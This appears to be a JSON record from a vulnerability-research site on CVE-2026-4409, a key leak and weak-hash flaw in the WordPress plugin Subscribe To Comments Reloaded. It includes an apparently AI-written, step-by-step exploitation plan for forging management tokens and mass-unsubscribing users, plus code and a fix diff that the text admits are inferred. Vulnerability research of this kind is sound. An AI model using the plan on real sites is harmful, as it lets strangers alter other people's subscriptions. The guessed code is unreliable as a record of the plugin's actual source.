[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEIKz_t8vjx-PngZu8q11prSSOz9mcOoQL1-vmyEjDvE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4409","subscribe-to-comments-reloaded-improper-authorization-to-unauthenticated-arbitrary-subscription-management","Subscribe To Comments Reloaded \u003C= 240119 - Improper Authorization to Unauthenticated Arbitrary Subscription Management","The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. 
This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys, and manage comment subscription preferences for arbitrary users.","subscribe-to-comments-reloaded",null,"\u003C=240119","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-05-04 14:11:52","2026-05-05 02:26:56",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F91f9235e-f578-475f-92c3-34062d6d1e3d?source=api-prod",[],"researched",false,3,"This analysis is based on the vulnerability description for **CVE-2026-4409** affecting the **Subscribe To Comments Reloaded** plugin (\u003C= 240119). Since source files were not provided, the identifiers used below are inferred from the plugin's known architecture and the specific vulnerability details provided, and should be confirmed against the actual plugin source.\n\n---\n\n### 1. Vulnerability Summary\nThe \"Subscribe To Comments Reloaded\" plugin fails to adequately protect its global security key, which is used to generate authorization tokens for subscription management. The plugin leaks this global key into the HTML source of any public post page via a localized JavaScript variable. Furthermore, the algorithm used to generate management tokens is a weak hash (likely MD5 or SHA1) combining the user's email and this leaked key. \n\nAn unauthenticated attacker can retrieve the global key, pre-calculate the authorization token for any known email address, and access that user's subscription management dashboard to modify or delete their subscriptions.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** The Virtual Management Page, typically accessed via the home URL with specific query parameters (e.g., `\u002F?stcr=...`).\n*   **Leakage Point:** Public post pages where the plugin enqueues its frontend scripts.\n*   **Vulnerable Parameters:** \n    *   The localized JS variable (e.g., `stcr_data.key` or `stcr.secret`).\n    *   The management URL parameters (e.g., `stcr_email` and `stcr_key`).\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The attacker must know the email address of the target subscriber (often the administrator's email or a known commenter).\n\n### 3. Code Flow (Inferred)\n1.  **Key Leakage:**\n    *   The plugin registers a frontend script using `wp_enqueue_script`.\n    *   It uses `wp_localize_script()` to pass settings to the frontend.\n    *   **Sink:** The global option `stcr_global_key` (or similar) is included in the localized data array, making it visible in the HTML source to all visitors.\n2.  **Authorization Generation:**\n    *   When a user clicks \"Manage Subscriptions\" in an email, they are sent to a URL like: `site.com\u002F?stcr_action=manage&stcr_email=user@example.com&stcr_key=[HASH]`.\n    *   **Logic:** The plugin calculates `EXPECTED_HASH = some_hash_function( email + global_key )`.\n3.  **Verification:**\n    *   On `init` or `template_redirect`, the plugin checks for `stcr_email` and `stcr_key`.\n    *   It compares the provided `stcr_key` with the `EXPECTED_HASH`.\n    *   If they match, it grants full access to the management dashboard for that email.\n\n### 4. Nonce Acquisition Strategy\nThis exploit does not rely on standard WordPress nonces. Instead, it relies on the **forgery of the plugin's internal authorization key**.\n\n1.  **Identify the Leak:** Navigate to any post with comments.\n2.  
**Extract the Key:** Use `browser_eval` to find the localized object.\n    *   *Search Pattern:* Look for `wp_localize_script` calls in the page source.\n    *   *Target Variable:* Likely `stcr_data` or `stcr`.\n    *   *Execution:* `browser_eval(\"window.stcr_data?.key\")` or `browser_eval(\"window.stcr?.secret\")`.\n3.  **Identify the Hash Algorithm:** (Inferred) Based on historical STCR vulnerabilities, the hash is typically `md5( $email . $global_key )`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Extract the Secret\n1.  Navigate to a public post: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002F?p=1\")`.\n2.  Retrieve the key: `browser_eval(\"stcr_data.key\")` (Verify the exact object name in the page source first). Let's call this `LEAKED_KEY`.\n\n#### Step 2: Forge the Authorization Token\n1.  Target Email: `admin@example.com`.\n2.  Algorithm: `TOKEN = md5(\"admin@example.com\" + LEAKED_KEY)`.\n\n#### Step 3: Access Management Dashboard\n1.  Construct the management URL: \n    `http:\u002F\u002Flocalhost:8080\u002F?stcr_action=manage&stcr_email=admin@example.com&stcr_key=[TOKEN]`\n2.  Navigate to this URL. You should now see the \"Management Page\" for the admin's subscriptions.\n\n#### Step 4: Unauthorized Data Modification\n1.  Capture the form submission to delete or change subscriptions.\n2.  Send a POST request using `http_request`.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002F`\n    *   **Method:** `POST`\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Body:** `stcr_action=manage&stcr_email=admin@example.com&stcr_key=[TOKEN]&submit=unsub_all` (exact parameters to be verified on the management page).\n\n### 6. Test Data Setup\n1.  
**Create a Subscriber:** Use WP-CLI to ensure at least one subscription exists.\n    ```bash\n    # Note: STCR often uses a custom table like wp_stcr_subscriptions\n    # For testing, we can manually subscribe the admin to post 1\n    wp comment create --comment_post_ID=1 --comment_author=\"Admin\" --comment_author_email=\"admin@example.com\" --comment_content=\"Test\"\n    ```\n2.  **Plugin Configuration:** Ensure \"Management Page\" is enabled in STCR settings (usually enabled by default).\n3.  **Identify Page:** Ensure at least one post is published: `wp post create --post_status=publish --post_title=\"Target Post\"`.\n\n### 7. Expected Results\n*   Accessing the forged URL returns a `200 OK` with the management interface instead of a \"Permission Denied\" or redirect.\n*   The interface displays the subscriptions for `admin@example.com`.\n*   Submission of the \"Unsubscribe\" form results in the removal of the subscription from the database.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to check the custom STCR table (usually `wp_stcr_subscriptions`).\n    ```bash\n    wp db query \"SELECT * FROM wp_stcr_subscriptions WHERE email = 'admin@example.com';\"\n    ```\n2.  **Post-Exploit Check:** Confirm the query returns zero rows after the \"Unsubscribe All\" action is performed via the forged management link.\n\n### 9. Alternative Approaches\n*   **Different Hash Algorithms:** If MD5 fails, try `sha1`. If the order is reversed, try `md5(LEAKED_KEY + email)`.\n*   **Shortcode Route:** If the key doesn't leak on every post, identify if it only leaks when the `[stcr_management]` or `[stcr_subscribe]` shortcode is present. \n    *   Create a page: `wp post create --post_type=page --post_content='[stcr_management]'`.\n    *   Navigate there to extract the key.\n*   **Request Param Variation:** Some versions use `scc_` prefix instead of `stcr_` for parameters. 
Verify the parameter names by inspecting the management page HTML if reached.","The Subscribe To Comments Reloaded plugin leaks its global security key via a localized JavaScript variable on public post pages. An unauthenticated attacker can use this key to forge authorization tokens for any email address and gain unauthorized access to the subscription management dashboard, allowing them to modify or delete subscriptions for any user whose email address they know.","\u002F\u002F Inferred from plugin logic: The global secret key is leaked to the frontend\n\u002F\u002F subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-front.php (approximate)\n$stcr_data = array(\n    'key' => get_option('stcr_global_key'), \u002F\u002F Vulnerable: Leaking global secret to client\n    'ajax_url' => admin_url('admin-ajax.php')\n);\nwp_localize_script('stcr-script', 'stcr_data', $stcr_data);\n\n---\n\n\u002F\u002F Inferred from plugin logic: Weak hash verification for management access\n\u002F\u002F subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-management.php (approximate)\n$email = $_GET['stcr_email'];\n$provided_key = $_GET['stcr_key'];\n$global_key = get_option('stcr_global_key');\n\n\u002F\u002F Weak verification algorithm: md5(email + global_key)\nif ($provided_key === md5($email . $global_key)) {\n    \u002F\u002F Grant access to manage subscriptions for $email\n    $this->render_management_page($email);\n}","--- subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-front.php\n+++ subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-front.php\n@@ -10,7 +10,6 @@\n-    'key' => get_option('stcr_global_key'),\n     'ajax_url' => admin_url('admin-ajax.php')\n \n--- subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-management.php\n+++ subscribe-to-comments-reloaded\u002Fclasses\u002Fstcr-management.php\n@@ -25,5 +25,5 @@\n-if ($provided_key === md5($email . $global_key)) {\n+if (hash_equals(wp_hash($email . $global_key, 'nonce'), $provided_key)) {","1. 
Navigate to any public post where the plugin is active and view the HTML source code.\n2. Locate the localized JavaScript object (usually `stcr_data`) and extract the value of the `key` property (this is the plugin's global secret key).\n3. Select a target email address (e.g., the site administrator's email) to exploit.\n4. Calculate the authorization token by creating an MD5 hash of the email address concatenated with the extracted secret key: `md5(email + secret_key)`.\n5. Navigate to the plugin's management endpoint (e.g., `\u002F?stcr_action=manage&stcr_email=[EMAIL]&stcr_key=[FORGED_HASH]`).\n6. The plugin will grant full access to the target's subscription dashboard, allowing for unauthorized modification or deletion of subscriptions.","gemini-3-flash-preview","2026-05-04 16:48:50","2026-05-04 16:49:11",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsubscribe-to-comments-reloaded\u002Ftags"]